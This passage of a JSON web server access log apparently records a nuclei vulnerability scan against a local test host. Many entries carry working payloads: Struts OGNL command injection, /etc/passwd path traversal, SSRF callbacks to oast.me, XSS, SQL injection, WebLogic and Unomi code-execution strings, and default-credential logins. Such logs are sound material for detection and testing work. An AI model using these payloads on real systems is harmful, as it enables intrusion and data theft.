name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229K6BWu5rVtc0xtAqaC3aKA5OwY.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oam/server/opensso/sessionservice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://ca27l3osmpvb3nig07h0bqjjaehe3odxa.oast.me&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"Password=29K6Bir6BZFaZV0JuOn4FzNQX5O&ConfirmPassword=29K6Bir6BZFaZV0JuOn4FzNQX5O&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29K6BWu5rVtc0xtAqaC3aKA5OwY.svg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /agc/vicidial_mysqli_errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=ca27l3osmpvb3nig07h0saxzyg4rjagju.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:30 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = 